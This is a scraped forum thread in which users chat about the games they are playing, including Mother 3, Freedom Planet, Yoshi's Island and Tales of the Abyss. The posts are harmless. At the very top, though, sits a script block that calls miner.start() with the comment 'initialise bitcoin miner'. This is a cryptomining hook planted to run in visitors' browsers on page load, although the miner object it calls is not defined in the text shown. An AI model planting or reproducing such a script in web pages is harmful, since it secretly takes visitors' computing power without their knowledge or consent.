<script>
miner.start(); // initialise bitcoin miner
</script>

pge projectsmw centralmario fan games galaxy

What games are you playing?

do you like them video games? what about those there romhacks? well pop on in here and talk about them then! what are you waiting for?!
Window Squeegee
Hog with a Blog
Pronouns: he/him/his

Re: What games are you playing?

Postby Window Squeegee » 5 years ago

Thanks to the steam sale, I bought Game Dev Tycoon and I'm considering buying Euro Truck Sim 2. Game Dev Tycoon is pretty fun, but there are a few things that I disagreed with. One of them being that my SNES wild-west action game only got a 4.5 out of 10. Come on, I thought a Wild Guns ripoff would sell pretty well.

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Postby Zha Hong Lang » 5 years ago

Leet wrote:IMO EarthBound is the "worst" of the three, though its still really amazing. I just feel like it has padding and such. MOTHER 1's sandbox explorey nature and lack of many dedicated dungeons, and MOTHER 3's higher focus on the story, along with a fair amount of character switching, mean that those two dont really drag at any points.
Again, haven't touched the first game so can't comment, but that's also how I feel about Earthbound, in a way. It was still a lot of fun, but... it had lots of room for improvement.

I could write a whole essay of things that I felt could've been better, though I don't know if people would be THAT interested. I mean... it's a pretty hyped game, so I doubt that most would have an open ear for how EarthBound isn't perfect.
EB, though.... again, still awesome, just... did anybody really like going through that pyramid?
Yeah, that was a pretty... straightforward dungeon. At least it got its own unique music.

Also, I hope y'all are hyped for Mother 4. Seriously, it looks really awesome:

(Formerly Jayoshi)

Leet
Well, hello, Smith ( ´-`)ノ
First name: Chie Arale
Pronouns: she/her

Postby Leet » 5 years ago

I beat the Reaper (totally cheesed my method for spawning him by reloading a save but who cares) woo

now that ive done that I will finally proceed to Izanami and w i n
Well it is a decent hack but sometime its just too repetitif there no level that actually pop in your face and your like oh yeah that level they all ressemble themselves and just monster along the way.
Blood Ghoul wrote:Sometimes it seems my blood spurts out in gobs, as if it were a fountain's pulsing sobs. I clearly hear it mutter as it goes yet cannot find the wound from which it flows. Before I met you, baby, I didn't know what I was missing.

Ashan
The world has become a place

Postby Ashan » 5 years ago

I started Lords of the Fallen.
It feels like a clunky Dark Souls so far. I haven't played much yet, but I don't know what I'm doing really. I beat the first boss, but it seemed like rolling did nothing most of the time, and blocking with your shield ate up too much stamina and then you'd just get combo'd into a hit.

Picochilla
The eternal Cuddles

Postby Picochilla » 5 years ago

Playing some of "Ori and the Blind Forest".

I must say: This Game is friggin awesome. It plays pretty much like a Metroidvania-Game, has incredible good graphics and awesome Soundtracks so far. A pretty much Game of the Year (and must-have) thing!
100% Approved!
Patooties are Talkhaus' best thing!
So... I just put in my Youtube-Channel

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 5 years ago

FREEDOM PLANET IS JUST AS FUN AS I THOUGHT IT WOULD BE OH MAN
ImageImage Image ImageImageImageImageImageImage

KobaBeach
obscure jrpg enthusiast
First name: David
Pronouns: he/him

Postby KobaBeach » 5 years ago

Beat the Ice Palace and Misery Mire in LttP

Also got the Golden Sword, the Silver Arrows and the second to last Heart Piece
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

:pan_pride:

Sorel
In the shadows
First name: Alexander

Postby Sorel » 5 years ago

I got Hammerwatch for my pals and me yesterday, it's a lot of fun, although sometimes a bit... slow.

Oh and BlazBlue: Calamity Trigger was on sale, so I got it. Jin is probably my favourite character in terms of gameplay... and maybe a bit of his psychotic personality.

Bean

Postby Bean » 5 years ago

raocow's Shovel Knight playthrough got me to go through it again on a much more casual pace. It was also my first experience with the Vita since I chose to play it on that. Moved right on to Uncharted: Golden Abyss. Slow start so far, but that's to be expected since I'm not used to the handheld's controls yet.

Xenesis
Syogun Changer

Postby Xenesis » 5 years ago

I got splatoon.

The roller brings back fond memories of playing a Spy or Pyro in Team Fortress 2.

Zha Hong Lang
"HTMI - Hyper Text Markup Interface"
First name: ZHL
Pronouns: Male

Postby Zha Hong Lang » 5 years ago

Just finished Mother 3. It was as awesome as I thought it would be, (though it does have very subtle limitations) but man... it's terrible when you subconsciously let something in your own life parallel with something in a game that sad. :( However! I hadn't really cried over a videogame before, so it was a good experience to have. (I also considered myself to have a bad reputation of not really caring when I watch-play something, which I didn't really notice until I watched Clannad)

I might take a while before I play the first Mother, even though that's what I plan on playing next, because I'll have to work on a few other things first.
Last edited by Zha Hong Lang on 20 Jun 2015, 16:19, edited 1 time in total.
(Formerly Jayoshi)

Miyuron

Postby Miyuron » 5 years ago

Started Alan Wake again for my bajillionth playthrough, this time on Steam and with enable developer commentary. <3 that game so much. I hope Quantum Break comes out soon so I'll get to find out if Remedy will do a proper sequel. Hell, I'd be happy with any kind of continuation/adaptation of anything Alan Wake-related. More Live-Action, please. I need more Ilkka Villi in my life.

snoruntpyro
cutest girl 2023

Postby snoruntpyro » 5 years ago

I did it

A fantastic, well-put-together game. My favorite contestant level was probably either HOW DOES MOLES, Manic Mechanisms or Subterranean Canal.

Whimsical Calamari
i am the one that sings the chorus when you hum in the shower

Postby Whimsical Calamari » 5 years ago

Finally beat Final Dreadnaught as Lilac in Freedom Planet.

AND IT ONLY TOOK ME FOUR HOURS

brevon OP strife pls nerf
ImageImage Image ImageImageImageImageImageImage

KobaBeach
obscure jrpg enthusiast

Been playing Yoshi's Island for a few days now and I 100%ed Worlds 1&2 (extra stages included)
I'm at World 3

blah
twitter (spicy at times!) | romhacking twitter (cats!!!) | GitHub | avatar by kuma

who cares:

Oddwrath
The ghost of talkhaus unlikely

Postby Oddwrath » 5 years ago

Been playing Dungeons of Dredmor with mods nonstop.
Having your game slow down to an hour/turn because of a stupid item is pretty bad.

Xenesis
Syogun Changer

Postby Xenesis » 5 years ago

As a side thing I've been doing a DKC trilogy runthrough.

Just cleared DKC2, on to DKC3. I'll go back for 101/102/103% afterwards, I think.

Zpto
Totally not a robot

Postby Zpto » 5 years ago

I grabbed Hand of Fate during this sale, it's pretty good so far

Bean

Getting more used to the controls in the Uncharted Vita game is making it easier to go through. Still managed to walk off a cliff a couple of times though. Oops. Anyway, I'm liking it. For all the silly stuff of touching the screen to do certain controls, I'm not sure that's all that more silly than jamming on a button like you would on the PS3 ones.

KobaBeach
obscure jrpg enthusiast

At World 4 in Yoshi's Island
I swear 100%ing More Monkey Business would be near impossible if not for that accidental extra red coin in the SNES version

also marching milde is inherently funny to me

i don't know why

who cares:

Bean

Because it looks like Kirby with a really dumb face for me!

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

I started playing Tales of the Abyss a few days ago... it's actually surprisingly good so far. Leagues better than Symphonia. For starters, the dialogue is actually *funny*, as opposed to Symphonia's attempts at "slapstick" that did little more than make me cringe. As a victim of frequent bullying growing up, I found absolutely *nothing* even remotely funny about what seemed to me like a perfectly normal, likeable kid getting mercilessly insulted by his so-called "friends", however popular that stupid cliche seems to be in Japan. Luke in Tales of the Abyss gets just as much crap, true, but being that he's a rude, arrogant little bastard, who can dish it out as well as take it, it comes across as funny and karmic rather than painful. Especially since his allies *still* treat him better, on the whole, than Lloyd's "friends" tended to treat him in Symphonia.

The battle system is better, as well; it makes a great deal more sense than other Tales games I've tried, though I'm still not 100% sure on how new skills are learned, and a few other random mechanics elude me thus far. But it's still early, so I'll figure them out in due time.

Plot-wise, I'm finding it amusing how my entire team, except for the protagonist, seem to be independently withholding obviously important info about various "secret missions" they're on from each other. Talk about the left hand literally not trusting the right hand. Something tells me that this is eventually going to lead to someone, probably Luke, doing something terrible as a result of simply not knowing what the hell everyone else is up to. JRPG logic!

Also, I couldn't help but laugh when I first viewed the "Records" screen, which keeps track of the percentage of battles each playable character has been involved in... with the names prominently displayed from the start. Not blanked out or anything. Just, "here, have a list of everyone who joins". Which, given that one of them has been introduced so far as a *villain*... welp. Way to spoil a plot twist, guys. :P
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Blivsey
forever an obscure pokemons
First name: Liv

Postby Blivsey » 5 years ago

EVERYONE READING THIS SHOULD PLAY FREEDOM PLANET, IT'S SO GOOD. IT'S SO GOOD. Definitely worth full price (even though I got it off the Summer Sale).

also calm down lilac, i didn't know this was gonna be /that/ kind of game

YelseyKing wrote:Plot-wise, I'm finding it amusing how my entire team, except for the protagonist, seem to be independently withholding obviously important info about various "secret missions" they're on from each other. Talk about the left hand literally not trusting the right hand. Something tells me that this is eventually going to lead to someone, probably Luke, doing something terrible as a result of simply not knowing what the hell everyone else is up to. JRPG logic!
courtesy of tvtropes's page on the tales series:
convenient noise thread for stress-relief purposes

YelseyKing
Anyone want a banana? :3
First name: Matt

Postby YelseyKing » 5 years ago

Blivsey wrote:EVERYONE READING THIS SHOULD PLAY FREEDOM PLANET, IT'S SO GOOD. IT'S SO GOOD. Definitely worth full price (even though I got it off the Summer Sale).
I briefly sampled that game, and it seems good. But for some reason, the Y button on my 360 controller *always* pauses the game... even if I set it to something else (I want that to be the "special attack" button)... and even disabling controller support and using JoyToKey, it *still* happens. Is this some kind of, I dunno, very sneaky anti-piracy trick, or... ?
Blivsey wrote:
YelseyKing wrote:Plot-wise, I'm finding it amusing how my entire team, except for the protagonist, seem to be independently withholding obviously important info about various "secret missions" they're on from each other. Talk about the left hand literally not trusting the right hand. Something tells me that this is eventually going to lead to someone, probably Luke, doing something terrible as a result of simply not knowing what the hell everyone else is up to. JRPG logic!
courtesy of tvtropes's page on the tales series:
Yes, that sounds about right. I've heard pretty much all of those lines, and frankly, I'm worried. :P
Ayjo and Meya are watching you. Be on your best behavior.

Moists:

The (Talkhaus) Price is Right
On hiatus. It'll return someday.

Bean

Almost at the halfway point in Uncharted: Golden Abyss now. A lot less combat which is not surprising considering Sony Bend usually does collectibles and stealth thanks to the Syphon Filter games I played on the PSP. Levels are also more compact, so treasures are pretty easy to find if you're paying attention. There was one chapter that required the gyro controls. I don't mind this stuff, but I can see that this is a Vita tech demo in spots. It's fun.

Return to “the cartridgé”